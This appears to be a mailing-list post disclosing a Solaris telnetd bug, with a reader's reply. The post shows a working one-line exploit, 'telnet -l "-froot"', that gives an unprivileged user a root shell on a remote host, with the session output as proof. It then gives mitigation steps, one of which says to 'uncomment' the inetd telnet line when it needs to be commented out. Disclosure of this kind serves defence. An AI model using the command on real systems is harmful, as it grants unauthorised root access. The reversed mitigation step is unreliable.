a very important info for all solaris admins, there is a bug in telnetd on nearly every solaris version:
pressy@mp-wst01 # id
uid=100(pressy) gid=1(other)
pressy@mp-wst01 # telnet -l "-froot" 192.168.40.1
Trying 192.168.40.1...
Connected to 192.168.40.1.
Escape character is '^]'.
Last login: Wed Feb 14 10:12:45 from 192.168.40.111
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
Sourcing //.profile-EIS.....
Sourcing //.profile-pressy.....
DISPLAY=192.168.40.111:0.0
root@vcsnode1 # id
uid=0(root) gid=0(root)
root@vcsnode1 # uname -a
SunOS vcsnode1 5.10 Generic_118833-33 sun4u sparc SUNW,Ultra-4
root@vcsnode1 # head -1 /etc/release
Solaris 10 11/06 s10s_u3wos_10 SPARC
more info:
there is no patch, so you need to disable the telnetd:
solaris <10 = uncomment the telnet line in /etc/inetd.conf and "pkill -HUP inetd"
solaris >10 = "inetadm -d svc:/network/telnet:default"
be sure to enable another login like ssh!
i've tried it on several maschines and it works! so hurry up!
I beleive so too, all the solaris 8 and 9 box I tested seem to be not vulnerable ... Many thankx for the info anyway (I used to be a great fan reader of bugtraq :o )